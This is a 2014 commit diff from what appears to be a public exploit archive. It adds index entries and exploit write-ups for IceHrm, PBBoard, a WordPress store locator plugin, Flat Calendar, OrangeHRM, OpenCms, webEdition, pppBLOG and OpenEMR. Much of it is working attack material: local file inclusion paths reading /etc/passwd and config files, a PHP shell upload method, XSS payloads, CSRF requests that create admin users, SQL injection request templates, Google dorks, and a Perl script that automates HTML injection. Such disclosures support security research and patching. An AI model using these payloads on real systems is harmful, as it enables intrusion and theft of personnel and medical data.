Updated 12_12_2014

2014-12-12 04:53:41 +00:00 · 2014-12-12 04:53:41 +00:00 · 8da471b3fa
commit 8da471b3fa
parent 19bac3ab1e
10 changed files with 809 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31968,6 +31968,9 @@ id,file,description,date,author,platform,type,port
 35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
 35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0
 35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0
 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
@ -31977,9 +31980,15 @@ id,file,description,date,author,platform,type,port
 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator  7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
 35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
 35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
--- a/platforms/php/webapps/35490.txt
+++ b/platforms/php/webapps/35490.txt
@ -0,0 +1,238 @@
 ?
 IceHrm <=7.1 Multiple Vulnerabilities
 Vendor: IceHRM
 Product web page: http://www.icehrm.com
 Affected version: <= 7.1
 Summary: IceHrm is Human Resource Management web software
 for small and medium sized organizations. The software is
 written in PHP. It has community (free), commercial and
 hosted (cloud) solution.
 Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
 including Local File Inclusion, Cross-Site Scripting, Malicious
 File Upload, Cross-Site Request Forgery and Code Execution.
 Tested on: Apache/2.2.15 (Unix)
           PHP/5.3.3
           MySQL 5.1.73
 Vulnerabilities discovered by Stefan 'sm' Petrushevski
                              @zeroscience
 Advisory ID: ZSL-2014-5215
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php
 01.12.2014
 ---
 1. Local File Inclusion (LFI) 
 #####################################################
 File: 
 app/index.php
 Vulnerable code:
 ---- snip ----
 include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
 app/?g=../&n=../../../../etc/passwd%00
 ---- snip ----
 Proof of Concept (PoC):
 http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00
 Severity:  CRITICAL
 #####################################################
 2. Local File Inclusion (LFI)
 #####################################################
 File:
 service.php
 Vulnerable code:
 ---- snip ----
 if($action == 'download'){
 	$fileName = $_REQUEST['file'];
 	$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
 	header('Content-Description: File Transfer');
 	header('Content-Type: application/octet-stream');
 	header('Content-Disposition: attachment; filename='.basename($fileName));
 	header('Content-Transfer-Encoding: binary');
 	header('Expires: 0');
 	header('Cache-Control: must-revalidate');
 	header('Pragma: public');
 	header('Content-Length: ' . filesize($fileName));
 	ob_clean();
 	flush();
 	readfile($fileName);
 ---- snip ----
 Proof of Concept (PoC):
 http://zsltest/icehrm/app/service.php?a=download&file=../config.php
 Severity:  CRITICAL
 #####################################################
 3. Malicious File Upload / Code Execution
 #####################################################
 File:
 fileupload.php 
 Vulnerable code:
 ---- snip ----
 //Generate File Name
 $saveFileName = $_POST['file_name'];
 if(empty($saveFileName) || $saveFileName == "_NEW_"){
 	$saveFileName = microtime();
 	$saveFileName = str_replace(".", "-", $saveFileName);	
 }
 $file = new File();
 $file->Load("name = ?",array($saveFileName));
 // list of valid extensions, ex. array("jpeg", "xml", "bmp")
 $allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
 // max file size in bytes
 $sizeLimit =MAX_FILE_SIZE_KB * 1024;
 $uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
 $result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
 // to pass data through iframe you will need to encode all html tags
 if($result['success'] == 1){
 	$file->name = $saveFileName;
 	$file->filename = $result['filename'];
 	$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
 	$file->file_group = $_POST['file_group'];
 	$file->Save();
 	$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
 	$result['data'] .= "|".$saveFileName;
 	$result['data'] .= "|".$file->id;
 }
 ---- snip ----
 Proof of Concept (PoC) method:
 1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
 Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
 2. Create a malicious file (php shell) save it with .txt extension
 3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
 4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.
 PoC example:
 1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
 2. xxx.txt contents:
 <?php phpinfo(); ?>
 3. Upload the filename
 4. Access the file:
 Severity:  CRITICAL
 #####################################################
 4. Cross-Site Scripting (XSS)
 #####################################################
 File:
 login.php
 Vulnerable code:
 ---- snip ----
  <script type="text/javascript">
 	var key = "";
  <?php if(isset($_REQUEST['key'])){?>
  	key = '<?=$_REQUEST['key']?>';
  	key = key.replace(/ /g,"+");
  <?php }?>
 ---- snip ----
 Proof of Concept (PoC):
 http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>
 Severity:  MEDIUM
 #####################################################
 5. Cross-Site Scripting (XSS)
 #####################################################
 File:
 fileupload_page.php
 Vulnerable code:
 ---- snip ----
 <div id="upload_form">
 <form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
 <input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
 <input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
 <input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
 <label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file"  type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
 …
 ---- snip ----
 Vulnerable parameters: id, file_group, user, msg
 Proof of Concept (PoC):
 http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E
 Severity:  MEDIUM
 #####################################################
 6. Information Disclosure / Leaking Sensitive User Info
 #####################################################
 Users’/employees’ profile images are easily accessible in the ‘data’ folder.
 Proof of Concept (PoC):
 http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
 http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id
 Severity:  LOW
 #####################################################
 7. Cross-Site Request Forgery (CSRF)
 #####################################################
 All forms are vulnerable to CSRF.
 Documents library:
 http://localhost/icehrm/app/service.php
 POST 
 document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument
 Personal info:
 http://localhost/icehrm/app/service.php
 GET 
 t=Employee
 a=ca
 sa=get
 mod=modules=employees
 req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}
 Add new admin user:
 http://localhost/icehrm/app/service.php
 POST
 username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User
 Change password of user:
 http://localhost/icehrm/app/service.php?
 GET
 t=User
 a=ca
 sa=changePassword
 mod=admin=users
 req={"id":5,"pwd":"newpass"}
 Add/edit modules:
 http://localhost/icehrm/app/service.php
 POST
 t=Module&a=get&sm=%7B%7D&ft=&ob=
 Severity:  LOW
 #####################################################
--- a/platforms/php/webapps/35491.txt
+++ b/platforms/php/webapps/35491.txt
@ -0,0 +1,84 @@
 ############################################################################## 
 # Exploit Title   : PBBoard CMS Stored xss vulnerability
 # Author          : Manish Kishan Tanwar  
 # Vendor          : http://www.pbboard.info/
 # version affected: all
 # Date            : 7/12/2014 
 # Discovered @    : INDISHELL Lab
 # Love to         : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
 # email           : manish.1046@gmail.com
 ############################################################################## 
 ////////////////////////
 /// Overview: 
 //////////////////////// 
 Program PBBoard is interactive Forum management program Dialogic
 Free classified software Free and open source.
 ///////////////////////////////
 // Vulnerability Description: 
 ///////////////////////////////
 Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute
 //////////////////////////////
 ///  Proof of Concept: -
 //////////////////////////////
 go to "inbox", click "compose message"
 type username, title and message body , intercept the request and change the
 content of "text" parameter with xss payload 
 when reciever will open the message, xss payload will execute
 Proof image:- http://oi57.tinypic.com/112d5cx.jpg
 //////////////////////
 ///Demo POC Request///
 //////////////////////
 POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica
 Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1
 Connection: keep-alive
 Content-Type: multipart/form-data; boundary=---------------------------147872036312473
 Content-Length: 670
 -----------------------------147872036312473
 Content-Disposition: form-data; name="to[]"
 ica
 -----------------------------147872036312473
 Content-Disposition: form-data; name="title"
 hi
 -----------------------------147872036312473
 Content-Disposition: form-data; name="text"
 hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">//
 -----------------------------147872036312473
 Content-Disposition: form-data; name="icon"
 look/images/icons/i1.gif
 -----------------------------147872036312473
 Content-Disposition: form-data; name="insert"
 Save
 -----------------------------147872036312473--
                             --==[[ Greetz To ]]==--
 ############################################################################################
 #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 
 #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
 #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
 #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
 #############################################################################################
                             --==[[Love to]]==--
 # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
 #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
--- a/platforms/php/webapps/35493.txt
+++ b/platforms/php/webapps/35493.txt
@ -0,0 +1,41 @@
 ######################
 # Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
 # Exploit Author : Claudio Viviani
 # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
 # Software Link : Premium
 # Dork Google: inurl:ajax-store-locator
 #              index of ajax-store-locator      
 # Date : 2014-12-06
 # Tested on : Windows 7 / Mozilla Firefox
 #             Linux / Mozilla Firefox
 ######################
 # PoC Exploit:
 http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]
 "download_file" variable is not sanitized.
 #####################
 Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 #####################
--- a/platforms/php/webapps/35506.pl
+++ b/platforms/php/webapps/35506.pl
@ -0,0 +1,130 @@
 #!/usr/bin/perl -w
 #Title		: Flat Calendar v1.1 HTML Injection Exploit
 #Download	: http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
 #Author		: ZoRLu / zorlu@milw00rm.com
 #Website	: http://milw00rm.com / its online
 #Twitter	: https://twitter.com/milw00rm or @milw00rm
 #Test		: Windows7 Ultimate
 #Date		: 08/12/2014
 #Thks		: exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
 #BkiAdam	: Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
 #Dork1      : intext:"Flat Calendar is powered by Flat File DB"
 #Dork2      : inurl:"viewEvent.php?eventNumber="
 #
 #C:\Users\admin\Desktop>perl flat.pl
 #
 #Usage: perl flat.pl http://server /calender_path/ indexfile nickname
 #Exam1: perl flat.pl http://server / index.html ZoRLu
 #Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
 #
 #C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
 #
 #[+] Target: http://server
 #[+] Path: /member_content/diaries/womens/calendar/
 #[+] index: index.html
 #[+] Nick: ZoRLu
 #[+] Exploit Succes
 #[+] Searching url...
 #[+] YourEventNumber = 709
 #[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
 use HTTP::Request::Common qw( POST );
 use LWP::UserAgent;
 use IO::Socket;
 use strict;
 use warnings;
 sub hlp() {
 system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
 print "Exam1: perl $0 http://server / index.html ZoRLu\n";
 print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
 }
 if(@ARGV != 4)	{
 hlp();
 exit();
 }
 my $ua = LWP::UserAgent->new; 
 my $url = $ARGV[0];
 my $path = $ARGV[1];
 my $index = $ARGV[2];
 my $nick = $ARGV[3];
 my $vuln = $url . $path . "admin/calAdd.php";
 print "\n[+] Target: ".$url."\n";
 print "[+] Path: ".$path."\n";
 print "[+] index: ".$index."\n";
 print "[+] Nick: ".$nick."\n";
 my @months = qw(January February March April May June July August September October November December);
 my ($day, $month, $yearset) = (localtime)[3,4,5];
 my $year = 1900 + $yearset;
 my $moon = $months[$month];
 if (open(my $fh, $index)) {
 while (my $row = <$fh>) {
 chomp $row;
 my $req = POST $vuln, [
   event => 'Test Page',
   description => $row,
   month => $moon,
   day => $day,
   year => $year,
   submitted => $nick,
 ];
 my $resp = $ua->request($req);
 if ($resp->is_success) {
    my $message = $resp->decoded_content;
 	my $regex = "Record Added: taking you back";
 	if ($message =~ /$regex/) {
 	print "[+] Exploit Succes\n";
 	my $newua = LWP::UserAgent->new( );
 	my $newurl = $url . $path . "calendar.php";
 	my $newreq = $newua->get($newurl);
 	if ($newreq->is_success) {
 	my $newmessage = $newreq->decoded_content;
 	my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
               print "[+] Searching url...\n";
         my $request = substr($newmessage, $first+26, 4);
         print "[+] YourEventNumber = $request\n";
 		 sleep(1);
 		 print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
 		 }
 else {
    print "[-] HTTP POST error code: ", $newreq->code, "\n";
    print "[-] HTTP POST error message: ", $newreq->message, "\n";
 }
 	}
 	else {
 	print "[-] Exploit Failed";
 	}
 }
 else {
    print "[-] HTTP POST error code: ", $resp->code, "\n";
    print "[-] HTTP POST error message: ", $resp->message, "\n";
  }
 }
 }
 else { 
 sleep(1);
 die ("[-] NotFound: $index\n");
 }
--- a/platforms/php/webapps/35514.txt
+++ b/platforms/php/webapps/35514.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/47046/info
 OrangeHRM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 OrangeHRM 2.6.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E 
--- a/platforms/php/webapps/35515.txt
+++ b/platforms/php/webapps/35515.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/47055/info
 Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 Versions prior to OpenCms 7.5.4 are vulnerable.
 http://www.example.com/opencms/opencms/system/workplace/commons/report-locks.jsp?resourcelist=null&resource=/demo_de&includerelated=false">XSSvector
 http://www.example.com/opencms/opencms/system/workplace/views/explorer/contextmenu.jsp?resourcelist=/deco_logo.png&acttarget=514f2">XSSvector
--- a/platforms/php/webapps/35516.txt
+++ b/platforms/php/webapps/35516.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/47065/info
 webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
 webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
 http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 
--- a/platforms/php/webapps/35517.txt
+++ b/platforms/php/webapps/35517.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/47068/info
 pppBLOG is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 pppBLOG 0.3.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/search.php?q=<script>alert(8888)</script> 
--- a/platforms/php/webapps/35518.txt
+++ b/platforms/php/webapps/35518.txt
@ -0,0 +1,268 @@
 Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
 CVE: CVE-2014-5462
 Vendor: OpenEMR
 Product: OpenEMR
 Affected version: 4.1.2(7) and earlier
 Fixed version: N/A
 Reported by: Jerzy Kramarz
 Details:
 SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.
 The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
 Request 1
 POST /openemr/interface/super/edit_layout.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
 [...]
 Content-Length: 134
 formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>
 Request 2
 POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
 [...]
 Content-Length: 135
 form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>
 Request 3
 POST /openemr/interface/billing/edit_payment.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Content-Length: 186
 Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
 CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection*gt;&ParentPage=&hidden_patient_code=&global_amount=&mode=
 Request 4
 GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
 Connection: keep-alive
 Request 5
 POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
 ----------1034262177
 Content-Disposition: form-data; name="form_pid"
 5<SQL Injection>
 ----------1034262177
 Content-Disposition: form-data; name="form_without"
 on
 ----------1034262177
 Content-Disposition: form-data; name="form_deposit_date"
 5
 ----------1034262177
 Content-Disposition: form-data; name="form_paydate"
 5
 ----------1034262177
 Content-Disposition: form-data; name="form_category"
 All
 ----------1034262177
 Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
 Content-Type: text/plain
 boom
 ----------1034262177
 Content-Disposition: form-data; name="MAX_FILE_SIZE"
 5000000
 ----------1034262177
 Content-Disposition: form-data; name="form_amount"
 5
 ----------1034262177
 Content-Disposition: form-data; name="form_encounter"
 5<SQL Injection>
 ----------1034262177
 Content-Disposition: form-data; name="form_to_date"
 5
 ----------1034262177
 Content-Disposition: form-data; name="form_payer_id"
 2
 ----------1034262177
 Content-Disposition: form-data; name="form_source"
 5
 ----------1034262177
 Content-Disposition: form-data; name="form_name"
 BOOOM
 ----------1034262177
 Content-Disposition: form-data; name="form_search"
 Search
 ----------1034262177
 Content-Disposition: form-data; name="form_date"
 5-5-5
 ----------1034262177--
 Request 6
 GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=<SQL Injection>&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
 Request 7
 POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
 form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4<SQL Injection>&form_from_date=0000-00-
 Request 8
 POST /openemr/interface/orders/pending_followup.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original
 form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5<SQL Injection>&form_from_date=2014-07-25
 Request 9
 POST /openemr/interface/orders/pending_orders.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
 form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4<SQL Injection>&form_from_date=2014-07-25
 Request 10
 POST /openemr/interface/patient_file/deleter.php?patient=<SQL Injection>&encounterid=<SQL Injection>&formid=<SQL Injection>&issue=<SQL Injection>&document=&payment=&billing=&transaction= HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
 form_submit=Yes%2c+Delete+and+Log
 Request 11
 POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
 Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5<SQL Injection>
 Request 12
 POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
 text=5<SQL Injection<&submitbtn=Search&mode=search
 Request 13
 POST /openemr/interface/practice/ins_search.php HTTP/1.1
 Host: 192.168.56.102
 Accept: */*
 Accept-Language: en
 [...]
 Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
 form_addr1=1<SQL Injection>&form_addr2=1<SQL Injection>&form_attn=5<SQL Injection>&form_country=U<SQL Injection>&form_freeb_type=2<SQL Injection>&form_phone=555-555-5555&form_partner=<SQL Injection>&form_name=P<SQL Injection>&form_zip=36<SQL Injection>&form_save=Save+as+New&form_state=W<SQL Injection>&form_city=W<SQL Injection>&form_cms_id=5<SQL Injection>
 Request 14
 POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6
 form_pelist=%2f&form_pid=0<SQL Injection>&form_save=Save&form_key=e
 Request 15
 POST /openemr/interface/reports/appointments_report.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
 form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=<SQL Injection>&form_provider=1<SQL Injection>&form_apptstatus=<SQL Injection>&with_out_facility=on&form_facility=4<SQL Injection>&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date
 Request 16
 POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
 Host: 192.168.56.102
 [...]
 Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci
